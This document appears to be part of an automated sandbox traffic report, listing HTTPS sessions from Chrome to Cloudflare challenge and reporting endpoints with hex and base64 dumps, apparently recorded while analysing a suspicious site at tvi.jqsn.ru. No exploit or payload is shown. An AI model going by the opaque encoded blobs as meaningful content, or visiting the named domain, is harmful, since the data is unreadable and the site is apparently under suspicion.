                                                                                                                          2024-04-17 00:34:28 UTC1369INData Raw: 6d 70 74 72 6a 57 35 6b 66 5a 46 6c 61 61 65 5a 61 6d 53 62 6b 49 42 78 6e 6e 4a 31 70 48 57 4d 6a 33 4f 52 73 62 56 37 72 4a 75 34 66 62 43 66 76 6f 53 32 6f 34 57 4a 6f 61 71 32 6e 62 69 35 7a 64 4f 39 70 36 54 55 6c 74 6d 75 32 36 33 46 71 4e 2b 30 72 70 76 67 7a 61 4b 36 75 71 53 37 6d 2b 6e 6f 35 61 57 72 78 63 6a 52 70 4b 57 38 76 62 44 30 39 65 75 73 72 62 4b 37 74 4d 2f 39 7a 37 37 38 75 39 66 53 33 2f 4c 69 31 2f 72 59 36 64 72 6e 44 39 72 76 36 2f 37 70 35 4f 38 58 42 66 72 54 35 52 72 75 46 75 44 58 46 42 6f 68 2b 52 6a 32 42 77 49 61 2b 2f 6f 4b 48 67 34 78 2b 69 59 45 45 77 67 6b 38 79 37 33 4e 6a 73 6d 44 2f 6f 57 47 44 49 41 52 43 51 39 41 6b 51 59 50 51 67 35 54 6a 30 4b 41 69 46 46 45 46 45 2b 54 52 4e 45 45 31 6f 6c 53 69 55 30 50 43 77
                                                                                                                          Data Ascii: mptrjW5kfZFlaaeZamSbkIBxnnJ1pHWMj3ORsbV7rJu4fbCfvoS2o4WJoaq2nbi5zdO9p6TUltmu263FqN+0rpvgzaK6uqS7m+no5aWrxcjRpKW8vbD09eusrbK7tM/9z778u9fS3/Li1/rY6drnD9rv6/7p5O8XBfrT5RruFuDXFBoh+Rj2BwIa+/oKHg4x+iYEEwgk8y73NjsmD/oWGDIARCQ9AkQYPQg5Tj0KAiFFEFE+TRNEE1olSiU0PCw
                                                                                                                          2024-04-17 00:34:28 UTC1369INData Raw: 48 64 7a 66 6d 47 63 67 49 53 4f 71 33 36 74 65 33 46 31 61 4c 47 48 69 37 65 31 70 4a 75 4a 64 5a 6d 54 72 4a 4b 6a 73 62 65 48 78 33 2b 66 71 59 79 70 79 71 53 6a 6a 63 7a 53 77 72 36 66 78 73 72 43 6a 4a 47 58 70 36 6a 53 32 64 4b 71 72 73 79 78 6e 38 50 67 70 39 53 34 77 64 79 2b 71 38 66 72 77 2b 6e 52 77 39 2b 76 74 4f 7a 6b 37 72 79 36 36 73 37 30 37 65 32 2f 42 66 58 55 31 73 4c 39 2f 63 76 6c 44 65 33 77 44 4e 2f 73 38 4f 51 52 31 73 33 34 45 66 55 59 31 76 58 36 38 2f 77 63 47 41 50 35 46 68 45 52 47 77 66 36 47 67 76 71 2b 41 51 71 4b 69 49 4f 44 77 59 52 4c 51 6b 7a 4c 69 72 30 2f 44 6a 33 49 6b 49 59 45 68 49 79 4e 43 67 63 49 67 49 70 43 69 39 46 50 7a 31 50 49 30 35 53 45 78 4a 56 4c 55 73 76 50 44 67 31 53 53 30 32 55 54 4d 66 50 47 41 35
                                                                                                                          Data Ascii: HdzfmGcgISOq36te3F1aLGHi7e1pJuJdZmTrJKjsbeHx3+fqYypyqSjjczSwr6fxsrCjJGXp6jS2dKqrsyxn8Pgp9S4wdy+q8frw+nRw9+vtOzk7ry66s707e2/BfXU1sL9/cvlDe3wDN/s8OQR1s34EfUY1vX68/wcGAP5FhERGwf6Ggvq+AQqKiIODwYRLQkzLir0/Dj3IkIYEhIyNCgcIgIpCi9FPz1PI05SExJVLUsvPDg1SS02UTMfPGA5
                                                                                                                          2024-04-17 00:34:28 UTC1369INData Raw: 6c 72 73 4b 4b 45 74 4b 69 44 6b 49 61 4f 6c 35 74 32 70 4b 75 52 71 34 31 34 6b 5a 39 39 6e 36 65 37 71 62 4b 41 67 37 61 45 69 36 71 59 76 4b 72 53 78 34 65 50 74 36 75 50 71 37 4f 7a 72 63 65 7a 34 4e 44 52 74 63 48 56 35 62 53 6b 36 71 4b 35 71 38 48 42 74 2b 47 70 7a 38 72 41 30 38 76 41 38 4c 50 74 7a 76 62 46 30 64 66 59 34 74 55 44 76 4d 4b 2b 35 76 41 44 2b 4d 6a 35 32 66 66 35 32 77 33 76 45 41 6e 72 44 63 30 53 41 68 55 50 46 77 7a 70 48 50 72 75 32 41 38 62 42 67 63 68 32 68 4d 61 42 75 6f 6c 37 76 6a 6f 2f 52 44 74 44 7a 4d 77 4d 41 34 70 47 79 67 4e 4b 78 45 64 43 68 6b 66 4d 7a 63 68 42 52 45 30 41 43 6c 4d 4a 54 63 6d 4f 6a 31 4b 51 6c 4d 4d 51 56 45 75 46 7a 4a 5a 47 52 6f 57 55 42 64 66 48 54 52 66 48 56 38 7a 4d 32 59 6a 61 6c 6c 57 5a
                                                                                                                          Data Ascii: lrsKKEtKiDkIaOl5t2pKuRq414kZ99n6e7qbKAg7aEi6qYvKrSx4ePt6uPq7Ozrcez4NDRtcHV5bSk6qK5q8HBt+Gpz8rA08vA8LPtzvbF0dfY4tUDvMK+5vAD+Mj52ff52w3vEAnrDc0SAhUPFwzpHPru2A8bBgch2hMaBuol7vjo/RDtDzMwMA4pGygNKxEdChkfMzchBRE0AClMJTcmOj1KQlMMQVEuFzJZGRoWUBdfHTRfHV8zM2YjallWZ
                                                                                                                          2024-04-17 00:34:28 UTC1369INData Raw: 79 6c 34 69 47 6b 37 53 47 6c 70 47 4d 6e 6f 71 76 6f 6e 2b 77 70 4c 47 63 75 38 65 70 75 4b 47 75 79 38 50 46 6d 36 6d 46 76 36 43 67 6f 61 53 74 6c 62 69 76 30 4e 54 56 6f 4b 2b 33 31 61 47 66 73 37 47 35 77 63 4c 55 34 4e 6d 71 76 62 6a 67 71 4e 2f 49 78 64 47 75 38 4d 6a 37 39 62 54 62 7a 64 67 41 39 50 65 2f 78 4f 2f 55 33 37 71 37 43 66 58 6d 33 50 66 77 34 51 48 45 38 2b 48 4f 46 66 54 4f 43 65 50 6c 36 68 2f 77 32 64 7a 70 46 68 72 79 38 42 45 66 33 75 59 64 49 67 67 72 42 77 67 6e 49 65 37 2b 4d 66 30 70 4b 52 49 5a 39 68 6b 4d 2f 42 51 4d 43 68 30 67 46 51 41 55 48 54 73 7a 52 45 59 62 4a 79 56 4a 52 6a 6b 45 54 7a 51 64 4a 43 30 54 47 54 41 36 47 45 6b 77 54 42 6f 72 59 79 42 6a 48 44 39 54 55 6b 6c 46 51 54 35 70 62 32 4a 6a 61 46 45 79 5a 55
                                                                                                                          Data Ascii: yl4iGk7SGlpGMnoqvon+wpLGcu8epuKGuy8PFm6mFv6CgoaStlbiv0NTVoK+31aGfs7G5wcLU4NmqvbjgqN/IxdGu8Mj79bTbzdgA9Pe/xO/U37q7CfXm3Pfw4QHE8+HOFfTOCePl6h/w2dzpFhry8BEf3uYdIggrBwgnIe7+Mf0pKRIZ9hkM/BQMCh0gFQAUHTszREYbJyVJRjkETzQdJC0TGTA6GEkwTBorYyBjHD9TUklFQT5pb2JjaFEyZU


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          14192.168.2.44975235.190.80.14433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:29 UTC532OUTOPTIONS /report/v4?s=H%2Fdah5A1d7hlg7hb04ppSsBJKMsf%2Bt6RPJ9%2BUEYcjiaSTzWY3T1dulP4JjnTYNxn6TpaCo4FHB58wFDZjPCXCP00rT3ecBmbaeYu3IKZ7NwB5HG89WpUPCGX%2BbcISQ%3D%3D HTTP/1.1
                                                                                                                          Host: a.nel.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          Origin: https://tvi.jqsn.ru
                                                                                                                          Access-Control-Request-Method: POST
                                                                                                                          Access-Control-Request-Headers: content-type
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-04-17 00:34:29 UTC336INHTTP/1.1 200 OK
                                                                                                                          Content-Length: 0
                                                                                                                          access-control-max-age: 86400
                                                                                                                          access-control-allow-methods: POST, OPTIONS
                                                                                                                          access-control-allow-origin: *
                                                                                                                          access-control-allow-headers: content-type, content-length
                                                                                                                          date: Wed, 17 Apr 2024 00:34:29 GMT
                                                                                                                          Via: 1.1 google
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Connection: close


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          15192.168.2.449753104.17.3.1844433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:29 UTC486OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/376309965:1713310987:XtWNF_lGr5ooSfnAjw_nRac0X3c-4XXJ9QQQN9vg0as/875854595e7f53f2/ce9d72d10a780bc HTTP/1.1
                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-04-17 00:34:29 UTC386INHTTP/1.1 400 Bad Request
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:29 GMT
                                                                                                                          Content-Type: application/json
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                          cf-chl-out: ROfNMEr1aAPICcOLNSQLxQ==$Ibt9cO/knuAQ75jrkC9kKw==
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 875854678c09674d-ATL
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-04-17 00:34:29 UTC12INData Raw: 37 0d 0a 69 6e 76 61 6c 69 64 0d 0a
                                                                                                                          Data Ascii: 7invalid
                                                                                                                          2024-04-17 00:34:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          16192.168.2.44975435.190.80.14433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:29 UTC478OUTPOST /report/v4?s=H%2Fdah5A1d7hlg7hb04ppSsBJKMsf%2Bt6RPJ9%2BUEYcjiaSTzWY3T1dulP4JjnTYNxn6TpaCo4FHB58wFDZjPCXCP00rT3ecBmbaeYu3IKZ7NwB5HG89WpUPCGX%2BbcISQ%3D%3D HTTP/1.1
                                                                                                                          Host: a.nel.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          Content-Length: 420
                                                                                                                          Content-Type: application/reports+json
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-04-17 00:34:29 UTC420OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 32 31 37 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 74 76 69 2e 6a 71 73 6e 2e 72 75 2f 69 38 6a 62 73 31 73 79 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 33 2e 31 34 37 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72
                                                                                                                          Data Ascii: [{"age":0,"body":{"elapsed_time":217,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://tvi.jqsn.ru/i8jbs1sy/","sampling_fraction":1.0,"server_ip":"104.21.3.147","status_code":404,"type":"http.error"},"type":"network-error","ur
                                                                                                                          2024-04-17 00:34:29 UTC168INHTTP/1.1 200 OK
                                                                                                                          Content-Length: 0
                                                                                                                          date: Wed, 17 Apr 2024 00:34:29 GMT
                                                                                                                          Via: 1.1 google
                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                          Connection: close


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          17192.168.2.449756104.17.2.1844433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:29 UTC775OUTGET /cdn-cgi/challenge-platform/h/b/i/875854595e7f53f2/1713314068893/8waoYsE4nxAn5eo HTTP/1.1
                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/8so0y/0x4AAAAAAAWQVeGKc1PBnczu/auto/normal
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-04-17 00:34:30 UTC208INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:29 GMT
                                                                                                                          Content-Type: image/png
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 875854694c52138e-ATL
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-04-17 00:34:30 UTC67INData Raw: 33 64 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 64 00 00 00 07 08 02 00 00 00 71 e0 7f f7 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                                                                                          Data Ascii: 3dPNGIHDRdqIDAT$IENDB`
                                                                                                                          2024-04-17 00:34:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          18192.168.2.449757104.17.2.1844433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:30 UTC804OUTGET /cdn-cgi/challenge-platform/h/b/pat/875854595e7f53f2/1713314068896/edde83305c606ea0c20efed6626591eb5ff70ccaffa9f8dd87ba107fdd444183/stHfhAVhA9tPb5n HTTP/1.1
                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: max-age=0
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/8so0y/0x4AAAAAAAWQVeGKc1PBnczu/auto/normal
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-04-17 00:34:30 UTC152INHTTP/1.1 401 Unauthorized
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:30 GMT
                                                                                                                          Content-Type: text/plain; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          2024-04-17 00:34:30 UTC1382INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 37 64 36 44 4d 46 78 67 62 71 44 43 44 76 37 57 59 6d 57 52 36 31 5f 33 44 4d 72 5f 71 66 6a 64 68 37 6f 51 66 39 31 45 51 59 4d 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                                                          Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20g7d6DMFxgbqDCDv7WYmWR61_3DMr_qfjdh7oQf91EQYMAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                                                          2024-04-17 00:34:30 UTC6INData Raw: 31 0d 0a 4a 0d 0a
                                                                                                                          Data Ascii: 1J
                                                                                                                          2024-04-17 00:34:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          19192.168.2.449758104.17.3.1844433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:30 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/875854595e7f53f2/1713314068893/8waoYsE4nxAn5eo HTTP/1.1
                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-04-17 00:34:30 UTC208INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:30 GMT
                                                                                                                          Content-Type: image/png
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8758546d8d04add1-ATL
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-04-17 00:34:30 UTC67INData Raw: 33 64 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 64 00 00 00 07 08 02 00 00 00 71 e0 7f f7 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                                                                                          Data Ascii: 3dPNGIHDRdqIDAT$IENDB`
                                                                                                                          2024-04-17 00:34:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          20192.168.2.449759104.17.2.1844433288C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-04-17 00:34:31 UTC916OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/376309965:1713310987:XtWNF_lGr5ooSfnAjw_nRac0X3c-4XXJ9QQQN9vg0as/875854595e7f53f2/ce9d72d10a780bc HTTP/1.1
                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                          Connection: keep-alive
                                                                                                                          Content-Length: 28852
                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                          Content-type: application/x-www-form-urlencoded
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          CF-Challenge: ce9d72d10a780bc
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: */*
                                                                                                                          Origin: https://challenges.cloudflare.com
                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/8so0y/0x4AAAAAAAWQVeGKc1PBnczu/auto/normal
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2024-04-17 00:34:31 UTC16384OUTData Raw: 76 5f 38 37 35 38 35 34 35 39 35 65 37 66 35 33 66 32 3d 76 56 44 36 68 34 37 6a 39 34 56 48 24 31 53 65 69 4f 76 4f 48 36 46 73 6e 4f 58 36 4b 57 48 62 62 4f 6d 4f 76 36 48 53 4f 63 35 4f 54 57 31 56 57 4f 61 62 4f 75 33 34 4b 6f 37 4e 35 4f 75 69 33 62 38 4f 43 68 73 24 36 4f 6f 36 37 62 75 25 32 62 4f 75 75 47 4f 50 76 59 62 47 4f 46 32 4f 37 61 4f 57 64 57 37 63 55 65 58 37 66 69 24 36 63 56 39 64 4f 76 33 37 67 4f 54 73 36 46 69 77 4f 75 24 4f 64 64 54 69 36 36 4f 65 31 4f 65 61 44 4f 37 72 37 63 34 57 24 4f 4f 72 45 75 58 36 56 57 45 24 4f 70 54 70 33 71 63 68 24 36 4f 59 37 75 71 57 33 69 31 62 6a 4f 35 4b 5a 4f 48 47 4f 36 75 45 45 4f 4f 6a 4f 57 71 45 37 31 48 44 54 31 45 77 37 48 63 46 38 39 43 55 4f 64 57 6d 67 33 57 51 4a 77 6e 4e 6a 36 47 31
                                                                                                                          Data Ascii: v_875854595e7f53f2=vVD6h47j94VH$1SeiOvOH6FsnOX6KWHbbOmOv6HSOc5OTW1VWOabOu34Ko7N5Oui3b8OChs$6Oo67bu%2bOuuGOPvYbGOF2O7aOWdW7cUeX7fi$6cV9dOv37gOTs6FiwOu$OddTi66Oe1OeaDO7r7c4W$OOrEuX6VWE$OpTp3qch$6OY7uqW3i1bjO5KZOHGO6uEEOOjOWqE71HDT1Ew7HcF89CUOdWmg3WQJwnNj6G1
                                                                                                                          2024-04-17 00:34:31 UTC12468OUTData Raw: 44 73 76 73 4f 50 34 4f 4f 34 49 6a 4e 54 44 41 47 65 5a 34 34 45 57 4f 62 52 67 33 34 5a 43 70 36 57 42 65 6c 45 46 62 57 57 48 52 6b 41 79 35 7a 34 36 37 24 4f 45 4f 31 57 37 4b 4f 4e 4f 4f 33 4f 38 36 54 48 45 43 37 55 47 70 44 48 47 57 57 56 37 36 35 24 37 78 4f 50 36 31 56 4f 37 4f 4f 77 62 53 37 43 4f 63 57 34 58 4f 57 4f 46 57 65 6f 4f 72 4f 4d 57 48 7a 37 68 4f 4b 33 62 47 37 4e 4f 6c 33 37 49 6b 45 39 55 77 71 2b 37 55 52 55 4f 76 6b 4f 6f 4f 61 6c 36 42 36 36 52 63 62 62 36 34 41 4f 35 4f 63 57 37 7a 4f 65 33 48 4f 4f 72 4f 24 4b 6f 67 77 73 4f 31 33 62 39 37 45 39 64 4f 76 24 4f 63 4f 4e 36 31 72 4f 57 4f 44 57 31 6d 36 43 4f 5a 57 4f 6f 4f 59 4f 50 4f 50 44 65 72 4f 46 34 34 41 4f 67 4f 38 33 35 47 37 43 33 37 33 65 66 36 64 4f 24 36 65 5a 37
                                                                                                                          Data Ascii: DsvsOP4OO4IjNTDAGeZ44EWObRg34ZCp6WBelEFbWWHRkAy5z467$OEO1W7KONOO3O86THEC7UGpDHGWWV765$7xOP61VO7OOwbS7COcW4XOWOFWeoOrOMWHz7hOK3bG7NOl37IkE9Uwq+7URUOvkOoOal6B66Rcbb64AO5OcW7zOe3HOOrO$KogwsO13b97E9dOv$OcON61rOWODW1m6COZWOoOYOPOPDerOF44AOgO835G7C373ef6dO$6eZ7
                                                                                                                          2024-04-17 00:34:31 UTC327INHTTP/1.1 200 OK
                                                                                                                          Date: Wed, 17 Apr 2024 00:34:31 GMT
                                                                                                                          Content-Type: text/plain; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          cf-chl-gen: 9jYnGfrVUDry3uWmU3DDFhNqKjsTXryXQ+OYecyeVPflqeiDLGX5SdL60rWsbeZz$snkn6xnp48zNSdEpp17Vyg==
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 875854710dd94517-ATL
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          2024-04-17 00:34:31 UTC1042INData Raw: 35 38 31 63 0d 0a 65 57 4e 2f 62 46 31 6b 58 49 75 4d 64 6b 69 4e 6b 6d 61 4b 6a 6d 71 49 65 6e 74 64 64 31 6c 2f 59 58 70 63 6d 48 56 2f 68 57 56 65 61 59 69 62 66 35 79 7a 63 33 42 2b 71 36 6c 31 6c 48 4f 54 75 4c 75 4e 69 49 36 74 6d 70 4b 41 6d 36 4b 55 6d 4c 2f 4b 74 5a 32 72 70 6f 61 72 72 49 6d 4f 71 38 4f 67 7a 63 71 7a 7a 63 32 32 71 74 57 79 73 70 69 65 76 63 4c 59 76 37 6e 43 70 73 58 46 71 74 57 6c 77 72 6a 74 35 4d 69 77 70 39 50 4d 32 4d 76 53 31 50 33 35 31 65 75 2f 77 62 2f 74 41 2f 4c 6b 2b 39 48 52 42 64 72 48 2f 4f 4c 68 7a 68 41 4a 34 63 6f 45 42 65 33 6a 32 64 58 73 35 65 55 4e 39 65 72 35 32 4e 58 78 45 2b 54 64 46 66 45 6a 35 2b 77 6d 4c 50 33 70 38 43 6f 75 2f 76 58 73 4a 43 34 4f 4f 50 59 74 39 77 30 4c 4e 54 77 67 48 44 38 55 50
                                                                                                                          Data Ascii: 581ceWN/bF1kXIuMdkiNkmaKjmqIentdd1l/YXpcmHV/hWVeaYibf5yzc3B+q6l1lHOTuLuNiI6tmpKAm6KUmL/KtZ2rpoarrImOq8Ogzcqzzc22qtWyspievcLYv7nCpsXFqtWlwrjt5Miwp9PM2MvS1P351eu/wb/tA/Lk+9HRBdrH/OLhzhAJ4coEBe3j2dXs5eUN9er52NXxE+TdFfEj5+wmLP3p8Cou/vXsJC4OOPYt9w0LNTwgHD8UP
